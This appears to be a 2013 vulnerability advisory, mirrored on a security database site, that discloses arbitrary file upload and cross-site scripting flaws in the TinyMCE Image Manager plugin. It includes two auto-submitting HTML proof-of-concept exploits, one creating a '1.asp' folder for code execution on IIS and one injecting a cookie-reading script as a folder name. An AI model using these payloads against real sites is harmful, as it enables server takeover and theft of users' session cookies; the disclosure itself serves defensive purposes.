Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29644
HistoryJul 19, 2013 - 12:00 a.m.

AFU and XSS vulnerabilities in TinyMCE Image Manager

2013-07-1900:00:00
vulners.com
93
JSON

Hello 3APA3A!

These are Arbitrary File Uploading and Cross-Site Scripting vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.

Affected products:

Vulnerable are TinyMCE Image Manager 1.1 and previous versions.

Affected vendors:

Dustweb
http://dustweb.ru/projects/tinymce_images/

Details:

Arbitrary File Uploading (WASC-31):

The attack is possible via "1.asp" in folder name. This is bypass method for executing arbitrary code at IIS web server.

TinyMCE Image Manager AFU.html

<html>
<head>
<title>TinyMCE Image Manager Arbitrary File Uploading exploit (C) 2013 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/tiny_mce/plugins/images/connector/php/&quot; method="post">
<input type="hidden" name="action" value="newfolder">
<input type="hidden" name="type" value="images">
<input type="hidden" name="path" value="">
<input type="hidden" name="name" value="1.asp">
</form>
</body>
</html>

Cross-Site Scripting (WASC-08):

This is persistent XSS on Linux/Unix and reflected XSS on Windows. The code will execute just after sending request for creating a folder and later on at requests to connector (at any operations, except creating a folder with existent name).

TinyMCE Image Manager XSS.html

<html>
<head>
<title>TinyMCE Image Manager XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/tiny_mce/plugins/images/connector/php/&quot; method="post">
<input type="hidden" name="action" value="newfolder">
<input type="hidden" name="type" value="images">
<input type="hidden" name="path" value="">
<input type="hidden" name="name" value="<body onload=alert(document.cookie)>">
</form>
</body>
</html>

Timeline:

2013.05.22 - announced at my site.
2013.05.23 - informed developer.
2013.07.18 - disclosed at my site (http://websecurity.com.ua/6527/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON